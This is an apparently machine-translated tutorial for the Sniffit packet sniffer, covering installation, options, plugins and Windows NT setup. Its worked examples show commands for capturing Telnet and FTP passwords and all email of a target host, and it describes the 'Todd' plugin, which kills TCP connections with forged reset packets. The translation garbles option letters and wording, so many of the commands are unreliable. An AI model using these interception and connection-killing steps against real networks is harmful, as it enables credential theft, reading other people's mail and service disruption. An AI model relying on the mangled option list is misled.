Sniffit is a network listening software developed by Lawrence Berkeley Laboratory that runs on Linux, Solaris, SGI, NT, and other platforms. It is mainly designed for the insecure TCP/IP protocol, listen to the machine that runs the protocol. As with all Sniffer, data packets must pass through the machine running Sniffit to be monitored. Therefore, Sniffit can only listen to machines on the same network segment.
Because Sniffit is easy to install and has powerful functions, it has become the preferred choice for hackers in UNIX. When conducting security checks on some compromised hosts on the Internet, it is often found that a large number of compromised hosts have been installed with Sniffit.
Another feature of Sniffit is the ability to freely add some plug-ins for it to implement additional features, which will be introduced later.
1. Install
1) use tar zvfx sniffit. *. *. *. tgz will download sniffit. *. *. *. decompress tgz to the target folder you want. if the version is 0.3.7, you will see a Sniffit.0.3.7 directory.
2) Open the Sniffit.0.3.7 directory.
3) execute the/configure & make command. If no unexpected error message is displayed on the terminal during this process, a binary Sniffit file can be obtained even if the compilation is successful, run it directly.
4) run the make clean command to clear the temporary files.
2. Usage
Sniffit has the following command options:
-V: displays version information.
-T <ip nr/name>: allows the program to listen to packets destined for an IP address.
-S <ip nr/name>: allows the program to listen to IP data packets outbound from an IP address. You can use the @ wildcard, such as-t 199.145.
@
-I: A window is displayed, showing the machines currently connected to the network.
-I: The extended interaction mode, ignoring all other options, is much more powerful than I
-C <file>: run the program using the script
-F <device>: forces the program to use the network hard disk.
-N: false data packets are displayed. If ARP, RARP, or other packets other than P are used
-N: Specifies the option when only plugin is run to invalidate other options.
The following parameters cannot work in-I mode:
-B: perform both-t and-s jobs.
-D: display the listening content on the current terminal in hexadecimal format.
-A: displays the content of the listener on the current terminal. It is represented by ASCll characters.
-X: prints TCP package extension information.
SEQ, ACK, Flags), which can work with-a,-d,-s,-t, and-B. Note: It is output to the screen through the standard. If only-t,-s,-B are used, and no other parameters are used together, the file will not be written.
-R <file>: records all communications in the file.
-R <file>: This option sends the record file to Sniffit. It requires the-F parameter to specify that the device uses 'eth0' (the first Nic) to record the file, '-F eth0' or'-F eth 'must be added to the command line. The specified character is used instead of an unknown character.
-P <protocol>: defines the listening protocol. The default protocol is TCP. You can also select IP, ICMP, and UDP.
-P <port> defines the listening port. The default value is all.
-L <length>: sets the packet size. The default value is 300 bytes.
-M <Plugin>: activates the plug-in.
There are also some parameters used in I and I modes:
-D <device>: All records are sent to this disk. The parameters used in the one-C mode are as follows:
-L <logparam>: logparam can be the following content:
Raw: mild
Norm: General
Telnet: Record password port 23)
Ftp: Record password port 21)
Mail: record the mail content port 25)
These parameters can be used in combination, such as telnet ftP mail norm.
1) graphic simulation interface:
With the I option mentioned above, you can enter the Sniffit in the graphic interface, that is, directly entering the sniffit-I, A Window environment will appear, you can see which machines are connected and which port numbers are used in your network. The available commands are as follows:
G: generate data packets. Normally, only the UDP protocol will generate data packets. to execute this command, you need to answer some questions about data packets.
N: generate a small window, including TCP, IP, ICMP, UDP, and other protocols.
R: refresh the screen and re-display the connected Machine
Q: exit the window and end the program.
F1: Change the IP address of the source domain. The default value is all.
F2: Change the IP address of the target domain. The default value is all.
F3: Change the port number of the source machine. The default value is all.
F4: Change the port number of the target machine. The default value is all.
2) Example:
Assume that there are two hosts in one subnet, one running Sniffit, Which is sniffit.com, And the other IP address is 66.66.66.7, which we call target.com. follow these steps:
1. Check whether Sniffer can run:
Sniffit :~ /# Sniffit-d-p 7-t 66.66.66.7
And open another window:
Sniffit :~ /$ Telnet target.com 7
Sniffit captured the echo service package remotely logged on to port 7 of the other party.
2. Intercept the user password on target.com:
Sniffit :~ /# Sniffit-p 23-t 66.66.66.7
It means to only listen to packets on TELNET (23) port.
3. If the root user of the target.com host claims a strange FTP connection and wants to record its action:
Siffit :~ /# Sniffit-p 21-1 0-t 66.66.66.7
4. Read all emails in and out of target.com:
Sniffit :~ /# Sniffit-p 25-1 0-B-t 66.66.66.7 &
Or
Sniffit :~ /# Sniffit-p 25-1 0-B-s 66.66.66.7 &
5. Interception control information when an error occurs:
Sniffit :~ /# Sniffit-P icmp-B-s 66.66.66.7
6. Listen to all packages from 66.66.66.7 and fully monitor them:
Sniffit :~ /# Sniffit-P ipicmptcp-p 0-B-a-d-x-s 66.66.66.7
7. Use the more 66 * command to read the password recorded in the following way:
Sniffit :~ /# Sniffit-p 23-A.-t 66.66.66.7
Or
Sniffit :~ /# Sniffit-p 23-A ^-t dummy.net
(3) advanced applications
1. Run the script
This works with option-c, and its execution method is also very simple. For example, you can edit a file named Sh in the following column:
Select from host 180.180.180.1
Select to host 180.180.180.10
SeleCt both Port 21
Then execute: sniffit-c sh
Note: The port for listening to packets sent from 180.18O.180.1 to 180.180.10 is the FTP port.
2. Plug-ins
To obtain a plug-in, you just need to put it in the sniffit directory and edit the sn_plugin.h file as follows:
# Define PLUGIN1_NAME "My plugin"
# Define PLUGIN1 (X) main_plugin_function (x)
# Include "my_plugin.plug"
Where:
L) You can set the Plugin from 0 ~ 9, so from PLUGINO_NAME ...... It does not have to be continuous.
2) # include. "My_plugin.plug", which is the place where your plug-in source code is placed.
3. Plug-In todd
Todd is the most famous Sniffit plug-in. It is short for Touch Of Death because it can easily cut a TCP connection. The principle is to send a disconnected IP packet to a host in a TCP connection, and set the RST position of this IP packet to 1.
Install tod and copy the downloaded tod.tar.gz file to the directory where sniffit is located. decompress the package and run the In-s Todd sniffit_key5 command to connect the program to the F5 key. If you want to cut off the machine, you only need to point the cursor to the machine to be disconnected in the window and press F5. Of course, you can also define other F function keys freely, but F1 ~ F4 doesn't work, because they have already been defined.
4 Sniffit NT Version
Sniffit 0.3.7 introduces the NT Version and also supports Windows 2000. Installing Sniffit for NT requires a WinPcap package, which is similar to lib ipvap. It supports Win 32 platform and can capture information packets and analyze networks, is a package based on The libpcap and BPF (Berkeley frame splitting filter) models of Unix. It includes kernel-level Packet filtering drivers, low-level dynamic connection library Packet. dll) and advanced system independence Library (libpcap, based on version 0.4a6 ).
This WinPcap information package captures the Startup Program, which can increase the power of the device sg on Windows 95, Windows 98, Windows NT, and Windows 2000, you can capture and send raw packets and Packet. dll is an API that can be used to directly access the BPF driver. It can be found on the Internet.
The following describes how to install sniffit in NT:
1) download Packet.exe and start installation.
2) Open the control panel, double-click the "Network and dial-up connections" icon, open the "local connection" icon, and select the "properties" option.
3) Select "Install" in the displayed dialog box to install the network components.
4) In the displayed dialog box, select "protocol" and click "add ".
5) in the displayed dialog box, select "Install from disk" and select the correct path, that is, the unzipped network device driver folder must contain Packet. inf and packet. sys), and then select "OK ".
6) Select "Packet capture Driver v X. XX" and follow the instructions to install the system disk.
7) check whether the Packet capture Driver v X. XX line exists in the network component. If yes, the Driver has been created and bound to the network for access.
8) restart the computer.
9) decompress sniffit_nt0.3.7beta and you can use it directly. The specific usage is the same as that of Sniffit for Unix.